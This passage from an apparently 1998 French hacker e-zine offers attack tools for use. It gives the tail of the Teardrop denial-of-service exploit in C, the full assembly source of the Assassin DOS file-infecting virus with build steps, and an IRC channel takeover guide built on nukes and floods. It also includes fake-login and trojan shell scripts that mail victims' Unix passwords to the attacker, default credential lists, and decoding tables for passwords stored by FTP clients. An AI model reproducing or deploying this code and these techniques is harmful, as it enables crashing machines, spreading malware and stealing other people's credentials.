     *  better.
     */
    p_ptr = &packet[2];         /* IP total length is 2 bytes into the header */
    *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
    p_ptr += 4;                 /* IP offset is 6 bytes into the header */
    *((u_short *)p_ptr) = FIX(MAGIC);

    if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

void usage(u_char *name)
{
    fprintf(stderr,
            "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
            name);
    exit(0);
}

/* 
      Fin du source de Teardrop
 */

pour utilisez ce nuke copiez le source ci-dessus et collez le dans un fichier
"teardrop.c"

loggez vous ensuite sur votre station linux et compilez le avec le GCC (compilateur
du projet GNU)

voici comment le compiler:

% gcc -O2 teardrop.c -o teardrop

copier ensuite le fichier executable teardrop dans /usr/local/bin
et faites un chmod +s teardrop
soit:
% cp teardrop /usr/local/bin
% cd /usr/local/bin
% chmod +s teardrop

desormais ou que vous soyez dans votre system en tapant "teardrop" vous 
lancerez le Nuke 
syntaxe: teardrop IP_adresse (ex: teardrop 134.59.0.1)

et voila Teardrop est capable de planter les stations sous
win95/98, winNT 4.0/5.0, OS2, MacOS, et meme certains Kernels de Linux! 
hehe le pied koi :) lol

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#05#
                   ________________________________
                  /                                \
                 /          -[ VIRUS ]-             \
                /   codes sources et compilation     \
               /________________________________ixtlan\




bah desole j'ai pas pu m'empecher :)
voici donc le source de ASSASSIN un gentil ptit virus:) heheh
copier le source dans un fichier .asm et compiler le avec n'importe quel compilateur DOS :) et voilou :)
heheh

-----------
; Assassin (Bug Fix version)
;       by Dark Slayer

mem_size equ    offset memory_end-offset start
mem_para equ    (mem_size+0fh)/10h
low_mem_size equ mem_size+100h
low_mem_para equ (low_mem_size+0fh)/10h
vir_size equ    offset vir_end-offset start
vir_sector equ  (vir_size+1ffh+2)/200h
constant_size equ offset constant-offset start

        .model  tiny
        .code
        org     0
start:
        xor     di,di
        mov     dx,ds:[di+2]
        sub     dh,5

        mov     ah,26h
        int     21h

        mov     bp,ds:[di+2ch]

        mov     ah,4ah
        mov     bx,low_mem_para
        int     21h

        mov     ah,52h
        int     21h
        mov     bx,es:[bx-2]
        mov     ax,cs
        dec     ax
mcb:
        mov     cx,ds
        mov     ds,bx
        inc     bx
        mov     dx,bx
        add     bx,ds:[di+3]
        or      bp,bp
        jnz     not_boot
        cmp     ax,bx
        jne     not_our_mcb
        add     word ptr ds:[di+3],low_mem_para+1
not_our_mcb:
        cmp     ax,cx
        jne     not_boot
        mov     ds:[di+1],dx
        mov     di,8
        push    ds
        pop     es
        mov     si,di
        mov     ds,ax
        mov     cx,di
        rep     movsb
        push    dx
        add     ax,10h+1
        push    ax
        jmp     short search
not_boot:
        cmp     byte ptr ds:[di],4dh
        je      mcb
        cmp     byte ptr ds:[di],5ah
        je      mcb
        mov     sp,low_mem_size
        sub     dx,mem_para+1
        mov     es,dx
        sub     dx,cx
        dec     dx
        mov     ds,cx
        mov     ds:[di+3],dx
        mov     si,100h
        mov     cx,vir_size
        rep     movs byte ptr es:[di],cs:[si]

        push    es
search:
        mov     ax,352ah
        int     21h
        pop     ds
        push    ds
        mov     di,offset i21_table
        mov     ds:old2a[di]-i21_table,bx
        mov     ds:old2a[di+2]-i21_table,es
        mov     ah,25h
        mov     dx,offset int2a
        int     21h
        mov     dx,bx
        push    es
        pop     ds
        int     21h
        pop     es
        lds     si,es:[di]
search_table:
        lodsw
search_table_:
        dec     si
        cmp     ax,8b2eh
        jne     search_table
        lodsw
        cmp     ah,9fh
        jne     search_table_
        movsw
        scasw
        lea     ax,[si-1e0h]
        stosw
        xchg    si,ax
        mov     word ptr ds:[si],0eacbh
        mov     word ptr ds:[si+2],offset i21_3e
        mov     ds:[si+4],es
        mov     byte ptr ds:[si+6],0eah
        mov     word ptr ds:[si+7],offset i21_3f
        mov     ds:[si+9],es
        call    set21

        mov     cx,bp
        jcxz    boot
        mov     ds,bp
        xor     si,si
l2:
        lodsw
        dec     si
        or      ax,ax
        jnz     l2
        lea     dx,[si+3]
        mov     di,offset pcb+4+100h
        push    cs
        pop     es
        mov     ax,cs
        stosw
        scasw
        stosw
        scasw
        stosw
        mov     ax,4b00h
        mov     bx,offset pcb+100h
        int     21h
        mov     ah,4dh
        int     21h
        mov     ah,4ch
        int     21h

boot:
        pop     dx
        mov     ah,26h
        int     21h
        mov     bl,3
        mov     ss:[bp+18h+5],bl
        mov     ax,1216h
        int     2fh
        inc     bp
        mov     es:[di],bp
        mov     ss,dx
        mov     ds,dx
        mov     ax,4200h
        mov     bl,5
        cwd
        int     21h
        mov     ah,3fh
        dec     cx
        inc     dh
        int     21h
        mov     ah,3eh
        int     21h
        push    ds
        pop     es
        push    ds
        push    dx
        retf

read_cmp proc
        mov     cx,vir_size
        mov     dx,cx
        push    cs
        pop     ds
        call    read
        jc      rc_exit
        push    cx
        xor     si,si
if (vir_size and 0ff00h) eq (constant_size and 0ff00h)
        mov     cl,constant_size and 0ffh
else
        mov     cx,constant_size
endif
compare:
        lodsb
        cmp     al,ds:read_buffer[si-1]
        loope   compare
        clc
        pop     cx
rc_exit:
        ret
read_cmp endp

read    proc
        push    bx
        push    dx
        push    ds
        mov     ax,1229h
        int     2fh
        pop     ds
        pop     dx
        pop     bx
        ret
read    endp

write   proc
        mov     bp,40h*2
i21_func proc
        pop     ax
        push    bx
        push    cs
        push    ax
        push    cs
        pop     ds
        push    ds:i21_far_jmp
        les     di,dword ptr ds:i21_table
        push    es
        push    es:[di+bp]
        retf
i21_func endp
write   endp

set2324_restore21 proc
        push    ds
        mov     si,23h*4
        xor     ax,ax
        mov     ds,ax
        mov     di,offset old23
        push    cs
        pop     es
        mov     ax,offset int23
        mov     bp,2
sm_23_1:
        movsw
        mov     ds:[si-2],ax
        movsw
        mov     ds:[si-2],cs
if ((int23-start) and 0ff00h) eq ((int24-start) and 0ff00h)
        mov     al,(offset int24-offset start) and 0ffh
else
        mov     ax,offset int24
endif
        dec     bp
        jnz     sm_23_1
        mov     si,di
        push    cs
        pop     ds
        mov     bp,-4
rs_1:
        inc     bp
        inc     bp
        les     di,dword ptr ds:i21_table
        mov     di,es:[di+bp+2+3eh*2]
        movsb
        movsw
        jnz     rs_1
        pop     ds

        pop     bp
        pop     ax
        push    es
        push    ax

get_sft proc
        push    bx
        mov     ax,1220h
        int     2fh
        mov     bl,es:[di]
        mov     ax,1216h
        int     2fh
        pop     bx
        jmp     bp
get_sft endp
set2324_restore21 endp

set21_restore23 proc
        mov     si,offset old23
        push    cs
        pop     ds
        mov     di,23h*4
        xor     cx,cx
        mov     es,cx
        mov     cl,4
        rep     movsw
        push    cs
        pop     es

set21   proc    ; es = vir segment
        push    ax
        mov     bx,-4
        mov     di,offset i21_3e_data
        mov     cx,es:i21_far_jmp[di]-i21_3e_data
        inc     cx
sm_1:
        inc     bx
        lds     si,dword ptr es:i21_table
        mov     ax,ds:[si+bx+3+3eh*2]
        mov     si,ax
        movsb
        movsw
        xchg    si,ax
        sub     ax,cx
        neg     ax
        mov     byte ptr ds:[si],0e9h
        mov     ds:[si+1],ax
        add     cx,5
        inc     bx
        jnz     sm_1
        pop     ax
        ret
set21   endp
set21_restore23 endp

i21_3e:
        call    set2324_restore21
        jc      jc_exit
        push    es
        pop     ds
        cmp     word ptr ds:[di],1
        jne     jne_exit
        les     ax,dword ptr ds:[di+28h]
        mov     dx,es
        cmp     ax,'OC'
        jne     exe
        mov     al,'M'
        jmp     short com
exe:
        cmp     ax,'XE'
        jne     jne_exit
com:
        cmp     dl,al
jne_exit:
        jne     jne_exit_
        les     ax,dword ptr ds:[di+11h]
        cmp     ax,vir_size
jc_exit:
        jb      jc_exit_
        cmp     ax,0ffffh-(vir_size+2)
        ja      jne_exit_
        mov     dx,es
        or      dx,dx
jne_exit_:
        jnz     i21_3e_exit
        mov     ds:[di+15h],dx
        mov     ds:[di+17h],dx
        les     si,dword ptr ds:[di+7]
        les     si,dword ptr es:[si+2]
        add     ax,si
        dec     ax
        div     si
        mov     cx,es
        inc     cx
        div     cl
        or      ah,ah
        jz      i21_3e_exit
        sub     cl,ah
        cmp     cl,vir_sector
jc_exit_:
        jb      i21_3e_exit
        les     ax,ds:[di+4]
        push    ax
        push    es
        and     ax,1000000000011100b
        jnz     close_
        mov     byte ptr ds:[di+2],2
        mov     ds:[di+4],al

        call    read_cmp
        jbe     close

        mov     si,cx
cmp_device:
        dec     si
        lodsw
        inc     ax
        loopnz  cmp_device
        jcxz    not_device
        dec     ax
        cmp     ax,ds:[si]
        je      close
        jmp     short cmp_device
not_device:
        mov     ax,es:[di+11h]
        mov     es:[di+15h],ax

        mov     cx,vir_size+2
        mov     dx,offset id
        call    write
        pop     bx
        jc      close
        sub     es:[di+11h],ax
        dec     cx
        dec     cx
        cwd
        mov     es:[di+15h],dx
        call    write
        pop     bx
close:
        push    es
        pop     ds
close_:
        pop     ds:[di+6]
        pop     ds:[di+4]
        mov     bp,0dh*2
        call    i21_func
        pop     bx
i21_3e_exit:
        mov     ax,1227h
        int     2fh
        jmp     i21_3f_exit

i21_3f:
        call    set2324_restore21

        les     ax,dword ptr es:[di+15h]
        push    ax
        push    es
        call    read
        pop     bp
        pop     si
        cmc
        jnc     jnc_exit
        test    word ptr es:[di+4],1000000000011000b
        jnz     jnz_3f_exit
        or      bp,bp
jnz_3f_exit:
        jnz     i21_3f_exit
        sub     si,vir_size
jnc_exit:
        jae     i21_3f_exit
        xor     cx,cx
        xchg    cx,es:[di+15h]
        push    cx
        xor     cx,cx
        xchg    cx,es:[di+17h]
        push    cx
        push    ax
        push    si

        push    dx
        push    ds
        call    read_cmp
        pop     ds
        pop     dx
        jc      i21_3f_exit_1
        jne     i21_3f_exit_1

        push    dx
        push    ds

        push    es
        pop     ds
        mov     ax,ds:[di+11h]
        mov     ds:[di+15h],ax
        add     word ptr ds:[di+11h],vir_size+2

        mov     cl,2
        mov     dx,offset read_buffer
        push    cs
        pop     ds
        call    read
        pop     ds
        pop     dx
        jc      i21_3f_exit_2
        cmp     word ptr cs:read_buffer,'SD'
        je      i21_3f_l0
        mov     ax,1218h
        int     2fh
        or      byte ptr ds:[si+16h],1
        jmp     short i21_3f_exit_2
i21_3f_l0:
        pop     si
        neg     si
        mov     ax,es:[di+11h]
        sub     ax,si
        mov     es:[di+15h],ax
        pop     cx
        push    cx
        push    cx
        cmp     cx,si
        jb      i21_3f_l1
        mov     cx,si
i21_3f_l1:
        call    read
i21_3f_exit_2:
        sub     word ptr es:[di+11h],vir_size+2
i21_3f_exit_1:
        pop     ax
        pop     ax
        pop     es:[di+17h]
        pop     es:[di+15h]
i21_3f_exit:
        call    set21_restore23
        push    ax
        mov     ax,1218h
        int     2fh
        mov     ax,ds:[si+16h]
        shr     ax,1
        pop     ax
        mov     ds:[si],ax
        retf

int23:
        call    set21_restore23
        jmp     dword ptr cs:old23

int24:
        xor     ax,ax
        iret
int2a:
        pop     cs:i21_table
        pop     cs:i21_table[2]
        sub     sp,4
        jmp     dword ptr cs:old2a

msg     db      ' This is [Assassin] written by Dark Slayer '
        db      'in Keelung. Taiwan <R.O.C> '

constant:

pcb     dw      0,80h,?,5ch,?,6ch,?
id      db      'DS'
vir_end:

read_buffer db  vir_size dup(?)

old2a   dw      ?,?
old23   dw      ?,?
old24   dw      ?,?
i21_3e_data db  3 dup(?)
i21_3f_data db  3 dup(?)
i21_table dw    ?,?
i21_far_jmp dw  ?

memory_end:
        end     start

---- FIN DU CODE DE ASSASSIN.ASM -----

   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#06#


  (((((((((((((((((((('''''''''''''''''''''''''))))))))))))))))))))))
  ((((((((((((((((((((       IRC TAKEOVER      ))))))))))))))))))))))
  ((((((((((((((((((((    ET AUTRES ASTUCES    ))))))))))))))))))))))
  ((((((((((((((((((((''''''''''''''''''''''''')))))))))))))){iXtlan}
  


Bon si vous lisez cet article c'est qu'apparement vous connaissez deja IRC... voila en quelques lignes comment effectuer un takeover sur un channel ;-)

mais avant tout il faut que vous ayez un ptit peu de matos:
- un client IRC of course (mIRC, BitchX, cIRCus,...)
- un script pour vous protéger (FloodProt et NetsplitDetect)
- un bon nuker (WinNuke ou Teardrop)
- quelques potes qui vous accompagnent dans le TakeOver
(optionnel: un bot type Eggdrop pret a venir sur le chan)

*** 1ere Etape: Preparation!

Bon on est samedi soir vous savez pas koi foutre, vous avez du shit, de la biere, des clopes, un ordi et un modem... 
"cool et si je me faisais un ptit IRC hackin!"
Bon vous vous connectez sur un rezo (undernet par exemple) et vous retrouvez vos cyber potes qui eux aussi sont bien chauds pour un ptit takeover sur un chan (auhazard ca tombe comme tjrs sur #kkk !!!;)

bon la phase de preparation est tres importante alors ne la negligez pas! Si vous avez un bot loggez vous tous sur le bot pour pouvoir parler penard a l'abri de regards indiscrets (eviter ainsi les IRCops qui ne peuvent pas espionner la partyline d'un eggdrop!).
Avant l'attaque il faut que tout le monde sache ce qu'il a a faire, et que chacun est bien mit s'est protections en place! faites un /names sur le channel a hacker et definissez qui fait koi (notez le IP des occupants du chan sur un notepad, histoire de gagner un peu de temp bien util)
grace a la commande /ctpc <nick> version vous pourrez savoir quels clients utilisent vos victimes, ce qui va definir quel type d'attaque utiliser...
Preparez deja vos Nukes en commencant par s'attaquer aux OPs!

*** 2eme Etape: la prise de l'Op!

Un fois que chacun sait ce qu'il a faire (qui il doit Nuker, qui il doit flooder) alors allez sur le chan mais pas tous en meme tmp! (le bot pourrait vous kicker s'il est equipe d'un TCL qui evite le MassJoin) et puis anyway ca fait tjrs suspect quand 5 ou 6 keums se pointent en meme tmp sur un chan...
aller y tranquille 2 par 2, parler avec les victimes, ayez l'air cool (on s'est jamais defois qu'il vous OP ce qui faciliterai la phase de prise de l'OP:) Pour prendre l'OP il faut descendre tous les OP (soit les flooder soit les nuker)mais evidement il faut faire ca vite! tres vite! donc pour le moment toute votre equipe doit s'appliquer a killer tous les OPs (et evidement le bot!)
Si le bot est un Eggdrop ni les nukes ni les floods ne le deconnecteront, dans ce cas ayez recours au bon vieux portfuck (precede d'un portscan pour localiser le bot sur le serveur)...

Un fois tous les OPs et le bot deconnectes attaquez vous au reste du chan, puis quand plus personnes n'est connecte (ce qui est en general assez long) alors quittez tous (sans exceptions) le channel, puis revenez... celui qui est rentre en premier aura alors l'OP et opera tout le monde, puis lancera les commandes suivantes 

/mode #kkk +b *!*@*  
  (ban tout le monde!)
/mode #kkk +islk fuck_kkk 6 
  (qui lockera le chan en invite only, mettra le clef "fuck_kkk" et      limitera le chan a 6 personnes )
/mode #kkk -b *!*@* 
  (deban le ban precedent sans risquer le retour des op officiels

vous pouvez desormais ramener votre bot sur le chan (attention il faut l'inviter avant)
/mode invite MonBot #kkk

le mettre OP et voila le chan est a vous, cool non ? ;-)
voila ceci dit faites gaffe n'abusez pas du TakeOver car les IRCops n'aiment pas ca du tout et vous risquez d'etre Glined ce qui est tjrs desagreable!

-------
NOTE: ne vous attaquez jamais a un bot X ou W!! ce sont les bots officiels d'undernet et vous seriez Glined tout de suite!!
--------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#07#

                               /"\
                              =====
                             =======
                ----------- ========= -----------
              {{{{   HACKER UN USER SUR UNIX  }}}}
                ----------- ========= -----------
                             =======
                              =====
                               \_/

[iXtlan]
(k)1998



Bon voici quelques petites techniques pour hacker le compte d'un autre utilisateur sur un system Unix/Linux...
Attention: cela ne vous permettra pas de prendre le root (a moin que l'admin system ne soit vraiment bon a rien) ...;-)

[ le Fake Login ! ]

Kesako?? hehe c'est tout simple mais ca marche 9 fois sur 10! en fait tout depend du niveau de comptence de l'utilisateur que vous avez choisi comme victime! Essayez de preference sur un utilisateur qui a l'air de ne pas savoir manier son clavier, le genre de gars a jouer a Duke Nukem toute la journée, et a surfer sur le web de microsoft a la recherche des dernieres softs pour fenetre95, enfin tu vois le genre koi UN GROS NAZE QUI COMPREND RIEN DE RIEN!!!!! (lol:P)

Bon le principe est simple: sous unix chaque connexion utilise un terminal (shell ou telnet) qui est en fait un fichier dans le rep '/dev'
chaque telnet lancé va utiliser un de ces fichier ttyXX (XX= numero du terminal)

faites un 'who' ce qui va lister les utilisateurs connectes avec leur numero de terminal...
% who

[user]  [tty]  [tmps de connexion]
-----   -----  ----------
user1   tty00    12:22 
user2   tty01    00:44 
user3   tty12    05:14
user4   tty08    01:00

voici le resultat d'une commande 'who'. On voit bien que chaque user utilise un terminal specifique (user1 utilise le tty0)hors chacun de ses terminaux est en fait un fichier /dev/ttyXX, ainsi vous pouvez ecrire sur ces fichiers ce qui s'affichera directement sur l'ecran du user qui utilise ce terminal!

voici donc ce que nous allons faire! (heheh)
on va executer un ptit script shell qui simule un Reboot du serveur et demandea l'utilisateur son Login et Password... 
voici le script deja ecrit 
 
#~/fakelogin.sh
# Ceci doit ressemblez au login du serveur a hacker...

echo "Rebooting system...."
echo " "
echo "Digital UNIX (machine.server.fr) (tty00)" 
echo " "
echo "login: \c"
read lgin
echo off 
echo "Password: \c"
read pw
echo " "
echo on
# mettez votre email
echo "Login: $lgin - Pword: $pw" | mail moi@server.fr

# fin du script

copier ce script dans un fichier fakelogin.sh (placer dans vote homedir)voila il vous suffit de faire en sorte que ce script ressemble au loggin de votre Unix et de mettre votre email puis de tapez:

% cat fakelogin.sh >/dev/ttyXX
(remplacer ttyXX par le terminal a hacke!)

et voila vous allez gentiment recevoir un mail vous donnant le login et le mot de passe de cet imbecile a qui vous venez de faire croire que le serveur a rebooter et qui lui a suivi betement les instuctions de la machine !! mdr hehe:) 

[ le fichier passwd ]

Bon evidement le plus simple pour hacker un unix est de lire directement tous les mots de passes la ou ils sont ecrit (c'est a dir dans /etc/passwd) mais bon la plus part du temp vous imaginez bien que l'admin ne laisse pas ce fichier en lecture ! ou alors il est encode ?... donc bon vous pouvez tjrs essaye

% cat /etc/passwd | more 

mais ca m'etonnerai que ca marche ou alors c'est que vous avec de la chance grave (si ca marche allez jouer a loto tout de suite!!! heheh)
Attention aux fausses joies car bien souvent le fichier passwd est encode! c'est a dire que le fichier peut etre lu mais les mots de pass sont remplaces par des '*' et les vrais pass sont dans un autre fichier qui lui n'est lisible que par le root! dommage......

[ permissions sur les homedir ]

he oui pourquoi ne pas profiter de l'oubli d'un utilisateur pour lui hacker son compte ? aller dans le repetoir des /usr (la ou sont tous les comptes des utilisateurs du system) et tapez

% ls -l | more  

ce qui listera tous les comptes avec les permissions:
---------------------
Rappel:
les permissions sur unix se font de la maniere suivante:
r = read 
w = write
x = execute

-rwxr-xr-x  signifie: -rwx (owner) r-x (group) r-x (all)
soit que ce fichier est en lecture/ecritur/exec pour le proprietaire
et en lectur/exec pour les autres

si il y a un 'd' devant cela signifie qu'il s'agit d'un repetoir
---------------------
bon voici un exemple de resultat affiche apres un 'ls -l' dans /usr

[permissions][user][date] [size]
------------  ----  ----   -----
drwxr-xr-x    bob   1998   21
drwxr-xr-x    bill  1998   11
drwxr-xr-x    Zoe   1997   05
drwxrwxrwx    fred  1998   32
drwxr-xr-x    Monic 1997   29

on voit que le homedir de fred est en drwxrwxrwx c'est a dire que vous pouvez nous seulment le lire mais aussi y ecire!!! heheh voila toute l'astuce, car Fred est surment un neophyte sur unix et il n'a pas pense a proteger son rep d'esprits malvaillants (comme vous par exemple) et l'a donc laisse en ecriture!!

vous pouvez donc installer tranquillement un ptit script dans le rep de fred de maniere a ce que celui ci l'execute et vous donne son mot de passe ! Sachez faire en sorte que fred execute ce script et aussi qu'il ne se rende pas compte qu'il est en train de lancer de lui meme un cheval de troie:)
(le mieux etant de mettre un procede d'auto destruction a la fin du script pour qu'il s'efface de lui meme:) 

voici un exemple de script a placer dans le rep de Fred:)

#!/usr/homedir/SECURITY
echo " "
echo "       SECURITY DAEMON     " 
echo " "
echo " The security Daemon has locate that your "
echo " password is unsecure please change it now!"
echo " "
echo "old Password: \c"
read pw
echo " "
echo "New Password: \c"
echo " "
echo "Thank you "
echo on
# mettez votre email
echo "Pword: $pw" | mail you@server.fr
# efface le script
rm -f SECURITY

# fin du script

une fois  que vous avez configurer ce script copier le chez fred
et rendez le executable

% cp SECURITY /usr/fred
% chmod u+x /usr/fred/SECURITY

et voila le pauvre fred une fois de plus en croyant bien faire c 'est fait pigeonner son mot de passe comme un bleu!!! heheh 

Voila pour les tekniks de hack sur Unix...
testez deja celles la ca devrait vous occuper un bon moment et y'en aura d'autres dans le numero 2 de KaotiX (a paraitre je sais pas quand :)!

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#08#
             _______________________________________________
             _______________________________________________
             _______   LES DERNIERES CONNERIES  ____________
             ________        DE MICROSOFT       ____________
             _______________________________________________
             _______________________________________________
             iXtlan(k)1998


he oui comme vous le savez tous la firme du legendaire Bill Gates n'est pas en manque de conneries! Il y'a meme parait il un recrutement special d'ingenieurs aptes a creer des bugs dans les rangs des societes le plus "buggées" de l'histoire de l'informatique moderne (disons depuis 1970)...
Bref la firme au papillon (qui se dit d'ailleurs "bug" en argo americian ce qui montre bien l'orientation prise pas mephistosoft! lol:)n'est pas en mal de bug, problem, et autres conneries et ca nous fait bien rire!
Voici donc quelques une des dernieres trouvailles en matieres d'"Erreur Fatale"  de chez nos potes de "mircomou" (hmmm)

[ Windows 98 ]
bah oui vous en avez bien entendu parler quelque part de ce fameux fenetre98... non? zetes sur? bah pas grave alors vous ratez pas grand chose! Ben oui on esperait beaucoup de win98: un system vraiment 32bits, qui offre une vraie gestion multitache/multi-utilisateur (comme un unix koi!) mais non win98 n'est qu'un remake de win95 version IE4 implante d'office dans le noyau! du coup en se retrouve avec une couche HTML partout!!!! ptin c est cool ca deja que Outlook sacage les mails de codes html ce qui est franchement desagreable quand on lit les mails en telnet ! alors la ca va vraiment etre le bouquet!!! a croire que MicroMou voudrait isoler les utilisateurs de 
windaube loin des autres OS (des fois qu'ils se rendrait compte que Linux c'est mieux. Comme koi y sont pas si con chez MSoft?! (non je deconne! lol)

[ WinWord98 ]
oups... alors la franchement decu! moi qui ai toujours bcp aime word,la version 8.0 m'a carrement foutu les boules!!! Deja ce souslignage des mots qu'il connait pas c'est d'un chiant!!! meme le mot "web" il sait pas ce que c'est (comme koi chez Mephisto y zont pas la tete sur les epaules!) En plus le prog est lourd (sur un P166 sous NT winword utilise 20% des ressources machine!!!! halucinant pour un simple traitement de texte! En plus si vous editez un fichier .doc avec un simple editeur (type notepad ou vi) y'aura plein de carracteres de tabulation type "\part" au debut de chaque ligne! argg... vraiment nul ;-(

[ Schedule + ]
Alors la bravo... dans cet agenda de bureau y'a plein de champs pour mettre, les numeros de telephones domiciles, bureau1, bureau2, fax, mais pas un seul pour l'email!! non non c'est pas une blague keudale pour mettre les emails! Tu crois qu'ils savent ce que c'est un email chez mephisto?

[ IE4 et l'active desktop ]
mouaaahhha !! lol ! kel konnerie!!! non sans blague je me marre bien a chaque fois qu'on me parle de ca! Non seulement IE4 est un browser de merde (y a qu'a voir comment y swap les images) mais en plus l'active desktop c'est du genre a plante le driver de la souris a chaque boot ou a virer l'image jpeg du backgound quand ca plante!! cool non :) enfin moi j'm en fous chuis un adepte de Netscape!

[ FrontPage98]
hmmmm lol:) re lol:) re re lol:) ouarf! ouarf!!zzzzzz!!! zZzZzZ! mdr!!! heu scusez moi mais mon rire traduit ma pensee :) la c est vraiment le comble a ce demander si chez MicroSophT y zont des acces a internet! regardes le source generé d'une page HTML par FP98 (ca vaut vraiment le coup rien que pour le nombre de fois ou il se repete!) moi j'vous l'dit le mieux pour le html c'est...NOTEPAD!

voila pour les mephistreries made in microsoft
au fait "jusqu'ou irez vous?"  
pas tres loin avec toi mon billou en tous cas!!! lol:)
(rire sarcastique)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#09#


                 """""""""""""""""""""""""""""""""""""""""
                 """""""""""""""""""""""""""""""""""""""""
                 """"                                """""
                 """"  COMMENT CRACKER UN PASSWORD   """""
                 """"                                """""
                 """""""""""""" [(k)1998] """"""""""""""""
                 """""""""""""" [ Xtlan ] """"""""""""""""



hehe cracker un password est un operation redondante dans la pratique d'un hacker! Que l'on essaye un connexion telnet sur un unix distant, d'entrer un system NT, en tant qu'admin, ou simplement de decoder un pass oublier, on a tjrs besoin de savoir comment cracker un pass!

Le plus important dans la teknik du crack de mot de pass c'est les facultes mentales que l'on va develloper pour arriver a son but! Le Brain Stormin est la seule maniere fiable de cracker un pass!

Bon pour commencer dans le cas du crack d'un user sur unix il faut avant tout tester les options de bases implementes dans le system!

ainsi on essayera depuis un telnet les possibilites suivantes! (ca marche defois mais pas quand l'admin a fait son boulot!! hehe)

"----" = vide
-[ Login ]-----------[ Password ]-----
  root                root
  root                machine.server.com  
  root                nom de l'admin system
  guest               guest
  anonymous           nick@server.com
  ----                ----
  user                user
  adm                 adm
  uucp                uucp
  nuucp               anon
  anon                anon
  games               games
  install             install
  reboot              ----
  demo                demo
  umountfsys          umountfsys
  sync                sync
  admin               admin
  daemon              daemon

mais bon ca marche pas tjrs! alors la on peut utiliser un password cracker c'est a dire un programme qui va debiter tous les mots du dictionnaire en esperant tomber sur le bon!
Le seul probleme est que de plus en plus les admins conseillent (voir exigent)des utilisateurs un mot de passe comprennant au minimum 8 caracteres et des symboles non alphadecimaux par exemple "7kjf-5okLm" 
(le genre de mot qui existe pas dans le dico!)

Il est alors tmp de faire preuve de vos competences en Social Engineering (voir dans Noway N°3)... 
Soit vous connaisez physiquement la personne a qui vous essayez de cracker le compte (vous pouvez alors essayer les trucs con du genre
nom du/de la petit(e) ami(e), chanson preferee, bookin prefere, et autres conneries en tout genre)... 
Vous pouvez aussi par exemple accorder a cette personnes un acces
sur votre Eggdop (par exemple) en lui demandant un mot de passe (qui risk fort d'etre le meme que celui de son compte unix) Car les gens ont la facheuse t'endance de reutiliser les mots de pass (manque de memoir surment!) 
Bon si rien de cela ne marche va falloir que vous vous demerdiez autrement...(lisez l'article n°7 sur le hack sous unix!)

Dans le cas d'un mot de passe sur le Bios de la machine les choses sont tres compliquees! et la seul un password cracker ou votre reflexion feront que vous penetrerez ou non dans le system ....

Un bon moyen de trouver des mots de passe est de controler les fichier .ini des programmes de FTP (CuteFTP, WSftp, et autres) qui tournant sous windaube, insrcivent les mots de pass codés dans le ini. Toute la betise etant qu'ils utilisent tjrs le meme encryptage qui devient donc tres facile a decoder! hehe
Cette technique est tres utiles car les universites, facs, institus, IUT, et autres ont presque tjrs deux rezo (un NT un Unix) et donc les utilisateurs chacun un repetoir personnel sur le rezo NT... Il suffit donc de zoner un peu sur les disks pour trouver les ini des clients ftp et voila :) hehe

Voici le mode de cryptage de WsFTP  sur win95
(fichier wsftp.ini)
--------------------------------
a = 61           A = 41          0 = 30 
b = 63           B = 43          1 = 32
c = 65           C = 45          2 = 34
d = 67           D = 47          3 = 36
e = 69           E = 49          4 = 38
f = 6B           F = 4B          5 = 3A
g = 6D           G = 4D          6 = 3C
h = 6F           H = 4F          7 = 3Z 
i = 71           I = 51          8 = 40
j = 73           J = 53          9 = 42
k = 75           K = 55          & = 26 
l = 77           L = 57          é = FF
m = 79           M = 59          " = 24
n = 7B           N = 5B          ' = 2A
o = 7D           O = 5D          ( = 2C
p = 7F           P = 5F          - = 32
q = 81           Q = 61          è = FF
r = 83           R = 63          _ = 66
s = 85           S = 65          ç = FF
t = 87           T = 67          à = FF
u = 89           U = 69          ) = 33
v = 8B           V = 6B          = = 48
w = 8D           W = 6D
x = 8F           X = 6F
y = 91           Y = 71
z = 93           Z = 73

vous remarquerez d'ailleurs que certains caracteres ASCII s'encodent de la meme facon! (é,è,ç,à = FF )

voici maintenant le mode d'encryptage de CuteFTP 2.0 pour win95
(les pass sont dans le fichier tree.dat)
--------------------------------
a = ©       b = ª       c = «       d = ¬        e = ­       f = ¾
g = ¯       h =         i = ¡       j = ¢        k = £       l = ¤
m = ¥       n = ¦       o = §       p = ¸        q = ¹       r = º
s = »       t = ¼       u = ½       v = ¾        w = ¿       x = °
y = ±       z = ² 

voila faites en bonne usage!! et si vous n'arrivez pas a acceder aux fichiers qui contiennent les pass depuis Windoze essayez sous Dos (defois ca marche:)

cd /rep_du_keum
edit tree.dat > c:/mon_rep/passFTP.txt

ensuite editez le fichier passFTP.txt dans votre homedir et voilou :)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#10#

                     ________ 
                    //      \\    |-|-|-|@@@@@@@>>>>
                   /.HTACCESS ET SES FAILLES!  
                  //          \\  -
                 //____       //  |
                             //   |
                            /_____|iXtlan[98]



La protection par htaccess et celle la plus utilisée sur les serveurs unix au niveau de la consulation des sites webs... Cette fonction va demander a l'utilisateur voulant acceder a un certain reperoire de donner un Login et un Mot de Pass...

voila comment ca fonctionne:
nous sommes dans le rep /home/fred/web

%ls -al

